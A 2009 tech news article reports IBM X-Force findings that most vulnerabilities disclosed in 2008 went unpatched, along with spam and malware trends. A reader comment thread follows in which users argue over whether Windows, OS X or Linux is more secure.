Majority of vulnerabilities go unpatched, IBM

Elinor Mills, CNET News.com | February 3, 2009 5:05 AM PST

Summary

More than half of the security vulnerabilities disclosed during 2008 had no patches available from the vendor by the end of the year, according to IBM.

Topics

Operating System, Vulnerability, IBM Corp., security, unpatched vulnerabilities, IBM, Elinor Mills, CNET News.com, Elinor Mills, CNET News.com

Vendor HotSpot

Here to help you with your Document Management Needs

Read the DocuMentor blog now

Learn More »

More than half of the security vulnerabilities disclosed during 2008 had no patches available from the vendor by the end of the year, according to a report released on Monday by IBM's X-Force research group.

Meanwhile, 46 percent of vulnerabilities from 2006 and 44 percent from 2007 still had no patch by the end of 2008, the 2008 X-Force Trend and Risk report said. X-Force documented a record number of 7,406 new vulnerabilities last year.

Overall, Microsoft is the vendor that tops the list in percentage of vulnerabilities disclosed, the report said. The Macintosh and base Linux kernel operating systems have dominated the top spots for vulnerabilities by operating system over the past three years, the report said. There were no breakdowns by vendor or operating system for unpatched vulnerabilities.

Most of the spam last year appeared to come from Russia (12 percent), followed by the U.S. (9.6 percent), and Turkey (7.8 percent), although the spam senders could be located in a different location, the report says.

China unseated the U.S. as the country hosting the largest number of malicious Web sites for the first time last year.

Meanwhile, 46 percent of all malware attacks last year were Trojans targeting people playing online games and doing online banking, and 90 percent of phishing attacks targeted financial institutions, according to the report.

Two main trends attackers used last year were SQL injection attacks, in which a small malicious script is inserted into a database that feeds information to the Web site, and malicious URLs hosting exploits.

Vendors with the most vulnerabilities disclosed in 2008.

(Credit: IBM X-Force)

The operating systems with the most vulnerability disclosures in 2008.

(Credit: IBM X-Force)

Updated 2:25 p.m. PST to add that report does not list which vendors and operating system platforms had the most unpatched vulnerabilities.

Originally posted as "IBM report: Vulnerabilities still going unpatched" by Elinor Mills on CNET News.com.

Talkback Most Recent of 19 Talkback(s)

Follow via:: RSS; Email Alert

There you have it, Apple OS X is the worst OS

by a *wide* margin when it comes to
vulnerabilities and security.

Many people will not believe this, even though
it has been clear for a long time (hint: try
finding Vista, OS X and Ubuntu on secunia).

Vista is the operating system with
the fewest vulnerabilities, Linux
(kernel i.e. not any specific distribution) has
about double that of Vista, OS X has about
triple that of Vista.

It may still be true that you are factually
"safer on a mac" (and Linux) - but it is
certainly not because the bad guys are short
on exploitable vulnerabilities on those
OSes.

This is the best proof that the relative
security you have on OS X and Linux is
only because of the lesser market share
makes it much more interesting to go after
Windows.

It also thoroughly debunks the myth that "many
eyes" review open source OSes and thus they
inherently let fewer vulns through. Microsoft
is using the SDL (security development life
cycle) and paying reviewers and testers
and accepts longer time-to-market because of
the inherently more rigid process.

Add to the above statistics that Vista + 2008
are the also the operating systems with most
extra protection mechanisms in place, wioth the
most granular access control lists and with the
most extensive group policies. This means that
even though a vulnerability was counted in the
above statistics it is far from certain that it
was actually exploitable.

Myth busting statistics indeed.
honeymonster
3rd Feb 2009
- Reply to
- Flag
The problem is...

I agree with you, but the problem is that these kinds of reports will always be dismissed as somehow being flawed, and people will just fall back to the "don't use Windows and security in the same sentence" type garbage.

What often seems to be ignored is that hackers need only one exploitable vulnerability to unleash an attack. Looking at the vulnerabilities per OS, it is clear that there are many opportunities where there are at least one such vulnerability for each OS.

Yet, Windows keeps getting targeted the most by far. Maybe when people start putting the logic together they will start seeing that this is purely marketshare driven. What would the logic have been for any hacker to target OS X if they could have gotten 30 times the return by targeting Windows? It is not even a linear scale wrt marketshare. It just doesn't make any sense to target anything other than Windows from a practical point of view, and has nothing to do with available vulnerabilities or difficulty of exploiting it (well, I have a feeling that most hackers have PCs, not Macs).

All adds up to the end result that Mac and Linux's super low marketshare is protecting them artificially from being viable targets, and their users keep patting themselves on the back because of that reason.

It's not Teh Secure, it's Teh Low Marketshare, stupid.
Qbt
3rd Feb 2009
- Reply to
- Flag
Yes, the marketshare, stupid

You are correct that a bad guy needs only one
vuln per OS *in principle*. Howeverm in real
life not all vulns are created equal. Some are
more easily exploitable than others, so the bad
guy need a *good* easily exploitable vuln on an
OS.

However, all operating systems are also putting
in more lines of defenses, defense in-depth.
This may make it significantly harder to
exploit vulnerabilities. A buffer overflow in
IEs rendering engine will be significantly
harder to exploit on a Vista/IE7 than on XP. A
buffer overflow in Chrome will be significantly
harder to exploit on Vista than if found in
Safari on Vista (Chrome also uses "low
integrity" protected mode on Vista).

Windows Vista leads the OSes in this sense.
Chrome/IE7/IE8 used on Vista or '7 raises
significant barriers for a successful attack.

As Vista (and '7) are becoming more popular
(another myth is that Vistas uptake is slower
than XP) that may well shift the attackers
focus to other OSes.

When the green grass of XP fields dries out
(pun intended), the bad guys are going to look
for more fertile pastures.

Nice, juicy Apple OS X is the obvious
candidate. It has a sizable market share
approaching 10%, it is by far (3 times Vista!)
the most vulnerable OS *and* it has limited in-
depth defense compared to Vista (and even to XP
SP2+). These are all verifiable facts. On top
of that OS X has the most gullible users
(personal opinion).

I predict that by the end of 2009 we will see
widespread attacks on OS X. And I also predict
that it is going to be ugly, really ugly,
because so many Apple users believe the myth
that they don't have to worry about malware.
honeymonster
3rd Feb 2009
- Flag
RE Busting "Eyes on the code" "myth".

I don't see where the Linux kernel having a greater volume of vulnerabilities identified/reported busts the "Eyes on the code" "myth" as you suggest. At the worst, this suggests that security analysts and others are more interested in identifying vulnerabilities in released Linux kernel code vs code under testing. I suspect this is just the nature of how they are motivated, and not specific to any OS.

The problem is no one can prove the ratio of undisclosed to disclosed vulnerabilities for any OS or application. If anything more vulnerabilities disclosed would seem to prove "eyes on the code" is working as advertised. Your real criticism should seem to be with the kernel development/release process itself, not with how well eyes on the code works.
enduser_z
3rd Feb 2009
- Reply to
- Flag
No undisclosed vulnerability updates

The problem is no one can prove the ratio of
undisclosed to disclosed vulnerabilities for
any OS or application.

Oh yes. Todays climate means that at least for
the OSes being used in the enterprise the
demand is that *all* patches/updates are being
justified. A company like MS cannot "slip" an
update through. Enterprise admins will
typically carefully review knowledge base
articles, patch descriptions etc. before
allowing the OS of a mission critical system to
be patched. They value predictability and
stability over patching just anything. If a
server is locked down with very limited surface
(behind a firewall/http proxy with no access to
use a browser from the server) it will
typically only receive a limited number of the
patches. Any patch/update inherently carries
the risk of tipping something over. So, MS and
others who want to play in the enterprise
simply *must* demonstrate a truthful and
complete disclosure of updates/patches.

I can not tell if you were implying that closed
source companies is using "slip it through
unnoticed" tactic to keep the numbers down. At
least in MS's case that is simply not possible
(and would be stupid). They can not patch
vulnerabilities unnoticed/undisclosed, but they
could of course try to keep their mouths shut
about them. But that would only buy them a
limited amount of time (they will be discovered
by someone else at some point). And these
statistics have looked like this for the past 3
years!

My point is that being open source does not
automatically guarantee better quality or fewer
vulnerabilities. As you say - it is about the
QA in the development/release process - which
is orthogonal to being open source. In other
words - no free lunch - both development
methodologies will have to put in place
security vetting processes. I say this only
because you often see someone claim that open
source inherently leads to more secure
software. Which is bull.

It doesn't inherently lead to worse or more
vulnerable software either. It has apparently
less to do with how the software was developed
and more to do with the QA process put in
place. And here OS X and Linux kernel is not
doing as well as the Microsoft SDL.
honeymonster
3rd Feb 2009
- Flag
Not what I meant.

I wasn't implying that MS is slipping patches through without disclosing the vulnerability, or even that they are aware of vulnerabilities which haven't been disclosed. What I was saying is we only know about disclosed vulnerabilities. This is the classic "you don't know what you don't know" problem. Just because one OS/app has more known vulnerabilities doesn't mean it have more vulnerabilities overall. I'm not making any statement about Linux vs Windows here, just stating a fact. We don't know if Windows has fewer disclosed vulnerabilities because it is in fact better designed (as you posit), or if this is because the "eyes on the code" just happen to be doing a far better job of pointing out flaws in the linux kernel. Everyone will have an opinion, but by definition you can't prove this. Either way, more disclosed vulnerabilities tends to prove the eyes on the code are working, which is the opposite of what you stated in your original post. This was my only point.
enduser_z
3rd Feb 2009
- Flag
Fair points

But I disagree wit this:

Either way, more disclosed vulnerabilities tends to prove the eyes on the code are working

That may be so, but not if a software product keeps having more vulnerabilities. If more eyes means more bugs discovered you would expect the bug-pool to dry up at some time. But the statistics have looked like this for 3 years.

And OS X isn't open source, btw. So closed source holding top and bottom spots. What could possibly be the explanation for that. That more researchers are looking at OS X???
honeymonster
3rd Feb 2009
- Flag
bug-pool will never dry up

"If more eyes means more bugs discovered you would expect the bug-pool to dry up at some time."

This could only be true (specially with such complex sofware as OS kernel) if the development of any new features would be stalled totally for years and only new code in OS would be bug fixes. There will always be a load of new bugs in any complex software that is still being developed on.
robsku
11th Feb 2009
- Flag
The problem with your theory...

...is that it makes little sense. For one there may very well be vulns in MS code that have not yet been discovered because no one but MS can see the code and anyone else must reverse engineer to find them.

Linux would almost always have more vulns because the source code is open for anyone to find them. Thats the whole point. It tickles me when people attempt to make fun of "eyes on code" actually WORKING. People are going to make mistakes. Thats inevitable. The point is that anyone can find those mistakes and it appears to be working.

Now if you want to talk about which system is more secure then you need to look at the extent of damage that can be done by exploiting these vulnerabilities. With Mac and Linux if the vuln does not include the ability to escalate to root then you know the damage can do no more than the what the user under which the exploit is running has permissions to do. And even with root an app can still be made to not do anything outside of its own permission set via SELinux or AppArmour.

Theres a guy that leaves his box open on the internet and gives you root access and asks you to hack his box. He's relying on SELinux and fine tuning it. Would you do that with a Windows box and feel you have any chance of surviving?
storm14k
3rd Feb 2009
- Reply to
- Flag
You have a link?

I am curious more than anything. And you make a valid point with your post as well... funny, how will the answer be spun in relation to your post?
Linux User 147560
3rd Feb 2009
- Flag
No problem at all

For one there may very well be vulns in MS code that have not yet been discovered because no one but MS can see the code

When reviewing source code only the most trivial bugs are found. No number of eyes looking at source code can replace testing. And unfortunately testers are not so generous with their time as developers are.

There might be more bugs hiding in closed source - but then again there might not. Statistics from independent entities such as IBM X-Force labs and Secunia suggests that Vista contains far fewer vulnerabilities than other mainstream OSes. It is not like nobody's looking for them. Can you show me anything to suggest that there are more bugs hiding? No? Didn't think so.

Linux would almost always have more vulns because the source code is open for anyone to find them

No, Linux have more vulns because security isn't such a big priority (with the myth that's its more secure) and because there's more prestige in getting your features in than there is in contributing work-hours for testing.

The point is that anyone can find those mistakes and it appears to be working

No, clearly it is *not* working. They have double the amounts of security bugs (a.k.a. vulnerabilities) than Vista. Now go and make fun of Vista again.

With Mac and Linux if the vuln does not include the ability to escalate to root then you know the damage can do no more than the what the user under which the exploit is running has permissions to do.

That comment completely exposes your lack of knowledge of this issue. 2 issues:

Firstly , It is the same with Vista, and even with XP.

No, I take that back, Vista actually has *more* protection than OS X and Linux: Unless you switch off UAC (which is on by default) you run under a restricted account without administrative privileges. But when running IE (or Google Chrome) the browser runs under an even more restricted account. That account does not have any rights on the system beyond writing in a secluded and protected cache. Downloaded files *can not* be stored just anywhere. A special broker process (running with normal integrity level) must be asked to reach in and grab the downloaded file and marshal it out. This means that the low integrity process does not inherently have file system rights.

On OS X and Linux the browser *must* run as the logged-on user to be functional. You can then try to reign it in with AppArmour. If you want to be able to download files with a browser it must inherently have that capability. Not so with Vista/IE7/Chrome.

And that is completely forgetting the fact that SELinux and AppArmour is a pain in the neck to set up and operate for the average user. So much that even though OS X has the capability, Apple has completely stayed away from turning it on. Go figure.

Secondly , while root access is really bad, just running *as you* is almost as bad. It can be leveraged in all sorts of ways. The attacker may modify scripts you usually run, he may take over and infect your running processes, he can combine the attack with a local privilege ascalation vuln (of which there has been plenty) etc. This is the same for all OSes and not special for Linux, OS X nor Vista. It is a dangerous way to think.

And we haven't even come to the various other protections, many of which both Linux but especially OS X in its current form lacks: Load address randomization, universal no-execute (both heap and stack), heap/stack encryption, wild exception handler protections etc. Vista have them all. These do not prevent vulnerabilities but they may often make it impossible to *exploit* vulnerabilities.

When I do a ps on my ubuntu i can see daemons running as root? wtf? On Windows (especially Vista/2008) most daemons runs as "local service" or (more commonly) as "network service". Both have just plain user privileges on the box. If you compromise such a process you are very restricted. OTOH if you compromise a root process, it's game over. And as you can see from the above statistics, it is not like there's a lack of exploitable bugs.
honeymonster
3rd Feb 2009
- Flag
You got it all upside down

"No, Linux have more vulns because security isn't such a big priority (with the myth that's its more secure) and because there's more prestige in getting your features in than there is in contributing work-hours for testing."

How can you, with serious face, make a claim that security is not a big priority in Linux development and testing? It is one of the two largest ones - the other one being stability (and these two also go hand by hand). *nix systems are secure because exactly of security being a top priority. Anything else than that and stability comes after.

"No, clearly it is *not* working. They have double the amounts of security bugs (a.k.a. vulnerabilities) than Vista. Now go and make fun of Vista again."

On highly complex projects like OS a high number of vulns is to be expected. It's the number of vulns found that proves "eye on code" to work and number of fixes that proves security being of high priority.

The argument of code being visible to others to be good for security is in fact proved by higher number of *found* vulns than closed source competitors.
robsku
11th Feb 2009
- Flag
RE: Majority of vulnerabilities go unpatched, IBM

VERY VERY MISLEADING TABLE hahaha
ZDNET is so unprofessional on this reporting

see, obviously most of the osx and osx server bugs are
the same and its very likely the same bug happens to
both of the OS as their sources should be very similar

and this should happen to some of the Windows bugs as
well, that some bugs are affecting several version of
OS

so to count it by item and make a percentage graph out
of it is just total non-sense!

one more thing is that the chart doesnt group windows
OS into one item so they are way down the list.

non-sense, non-sense.

(btw, I have both a mac and a windows machine.)
cktang
4th Feb 2009
- Reply to
- Flag
How many OSX and Linux are on the botnets?

spreading malware, spam, etc.?
gigogogogown
4th Feb 2009
- Reply to
- Flag
Microhard instead of Microsoft

I just want to say Windows is not error free at all I have even resulted in buying another system and VISTA the terror of operating systems is on my laptop and that sucks to, what happened to DOS the good old days.
Read my blog review for windows story!

Click on the link below:

http://www.computersight.com/Operating-Systems/Windows/Where-is-Windows-Trouble-Shooter-1.506633
Dmobile215
5th Feb 2009
- Reply to
- Flag